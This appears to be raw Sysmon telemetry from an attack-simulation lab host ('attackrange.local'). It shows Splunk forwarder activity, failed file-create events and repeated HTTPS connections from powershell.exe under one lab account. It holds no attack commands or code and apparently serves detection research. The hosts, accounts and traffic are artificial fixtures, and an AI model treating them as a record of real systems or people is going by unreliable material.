18:13:44.260{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4ED8-613A-4F90-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.260{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4ED8-613A-4F90-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.246{B81B27B7-4ED8-613A-4F90-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:10.098{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56676-false10.0.1.12-8000- 23542300x800000000000000035084977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:45.390{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7C9C0004AEC2B4776BDC2D3E8771F0B,SHA256=B2563ED6A45799416D6862C125EC8C9B1BA6038C452294BDDD2319573278D9D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:11.465{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56677-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:46.457{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DA621CA099033B5EC17758E40B702D9A,SHA256=CA7B072D9557D361A8CC7989D0B285E38E678EDE058625E99DE62BE667D38ADA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:46.407{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=587EEA4E89E33B73DC096757328FBC40,SHA256=2BA7615C62443F3E01D4C099C2D49706852E5E365C96F0144766A2229B5B915A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:46.042{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=316714ECACB1A7061660DDE173E5453B,SHA256=44826985AF8333EBF954FAA43920994E0F557DB25515E8ED4CF2A3FA876C70DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:47.441{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EB526B67E03FA8AAD8434B641E2A9D6,SHA256=20A68001E480EBFCE315FCC3F540D2179F0D3385B154AA77B8116B8203C08B40,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:48.471{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E0CD7807AF1A696AE65A4CF2BE05F39,SHA256=66BD6FF0EEDB07BD0740CD7413483D00604506ED358884D3759551095E0343A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:49.502{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A8388A876A67359DC11B22CE9EF4383,SHA256=4CE138DA01351AB73E43272E9CAEC625FFA0366AD8ED7862DB70740A1E1A5EAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:15.145{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56678-false10.0.1.12-8000- 23542300x800000000000000035084986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:50.522{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8BA40E9B78A17EA76B38928099BC21B,SHA256=719B3ED0397CF3DB44092F3C0F0B9B8A2F7A1DEE0B15A93958733874DDE8781D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:51.552{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58FA927AF2EB1D17D79A411CFA37CD62,SHA256=F5A41042FE4F9286715478D9BCCC6E05EED97551C95F155CA2CB3DE71B82F85D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:17.474{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56679-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:52.603{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=15621FBABFB64B93A82F912200F5E6C2,SHA256=D17A67936D544EF7B199DC52C36E03B2574FEEF070534CAF4BC328852200BC22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:52.599{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D52F953999F2961A6336490283199F8,SHA256=CBD9AEBB4E2871BC3CD2B1E0293F34F59DDAF5B221F781F8769F131F9779E73B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:53.634{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46BDE0C7FDE5A3C0430063D2B85567F0,SHA256=50E05FC7A9115F29050C20D5334FAFE57057BDDEBF1505C5CE331030CDBACCE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:54.902{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:54.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=294C09359CC2E05F230D9BDF1A3ECB8C,SHA256=9F59F831DDF3EF9C750E2A13A40A39F8710A488BD5A515FC398331FD4A73EA11,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:20.202{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56680-false10.0.1.12-8000- 23542300x800000000000000035084995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:55.701{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C127B9C40D3F0CA29EE2C1EB6AE736F,SHA256=9A287008A995A426628843951A92320F7713C53EBE92A43A2F7E806C63941102,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:20.917{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56681-false10.0.1.12-8089- 23542300x800000000000000035084997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:56.746{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=369ADD671EF9C99FB7E00CD6128EE4D0,SHA256=311C376F96B979BBE9B1776BC3F2D5717E4CA7689D32AB11EB6B839FD96318DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:57.777{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25596AA6BE9110FE7214EF62B012C5EE,SHA256=E70CB4171E9CB146F870668405FB676062621BDA8D472D407DA9C8A93CCA1C14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:57.630{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F8159D5B0403F5A1A2FB7391B184DFB4,SHA256=D1F23575B3284B068ECDB2F009F5B96277C570262FEB0E62BDACEAC4C3B67AF8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:22.485{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56682-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:58.795{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B83B53126630C9A842BE9A8E82D92EE,SHA256=D6DA1A8005B4D1238D0571F259DE4838BA7BCEBE97A4DBEC09849BED3FA6E40A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:59.812{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABB4A14236ED93CF10DDD3782F101E0A,SHA256=2AF4163618C19AC52A0398DC8AD606703971AF4B9A965B7507074DF3DC506C83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:00.827{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E5DE4DF99B7AC795FE00F0B4286B8E0,SHA256=83A1895B59AE33A4ADB4C2EC193AAE789D945A3D2112121A6F21BB02705E2355,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:01.841{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDC0734E34041453C3EC5D697B4D50B0,SHA256=ED47C968F873C59DDC473702BD9826914D10732C864E433F08DC283B139EDD7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:26.234{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56683-false10.0.1.12-8000- 23542300x800000000000000035085007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:02.842{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBA7172D683AD532679D238BB4CA5F06,SHA256=190C43E8AFB2CB1235263214E8E54A1C3A113ACC257D721CD19E384689B1B0AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:02.711{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=11F7851ADEAAED6DEC91B09E76AB9C88,SHA256=BFB78E4A14404236876EF1C7FB762CFAD1E8938AD6DE1C055224CC4A73F64170,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:27.495{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56684-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:03.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=093641CE48F3A86292F8304D6B147A55,SHA256=340394E4BADBEC885744C9722C52988F5CC4BAE853DA33DFD84E1C06260CC899,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:04.893{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2096F4531AF86AD34E0C3FFAFF728D05,SHA256=8400586903875C532852CFFB3376DB7F8E94750AA2B626F9992364AEFD9F24F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:05.939{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CFCE7A2D57AA481202AEE47CF93FA4E,SHA256=38B556DA34D9481E686953039D9C688449814FA507ADF8F1996A3FDC5E26B3D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:06.953{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DCE7703B6384E46CCEAE99522FCC7B6,SHA256=F12BD584EF09F33743847CD88666D6C0C594564DDEA022A000722681E3078763,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:07.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85006D543CC97F307A1CF8B3129603BF,SHA256=B34146B700E9F1783B3B4FE3FC3CC3D96D7101B846F42E2CAF90106CAC866FF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:07.637{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BF78C145AE1352214D9D961A1F9D48E7,SHA256=8BE59C6E0408DA82D2E78E9F1F6D55138699BD01A16C8F0C2778E1CA4992AC73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:31.261{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56685-false10.0.1.12-8000- 23542300x800000000000000035085017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:08.968{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6546E93B2EB0CF06E8628FAE93699A79,SHA256=38D52FD6D326C39227772A378B639AB7F1278BE0347ABE2B458680944BB428DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:09.985{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCD35BF719372F05EA914FB0771D012E,SHA256=174204EDB4BE876CA39B788CD35C6CB3D3F658A3E10A98ECEA2B4B315D3E05E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:32.507{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56686-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:11.004{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF308D29E9FEBCFECC1C6FD05E9E77DC,SHA256=3A60D6921AD5193966B0757F2E1175B247C5898928464C85340F2DAA9CC05F95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:37.026{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56687-false10.0.1.12-8000- 23542300x800000000000000035085021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:12.035{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=494211981CAEA1144120427D28551662,SHA256=5BB68B880EEB980AC2DCBAD1BBA9E0C224F19EFDDD38B5A17BFCDE044E94AE04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.749{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EF5-613A-5290-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 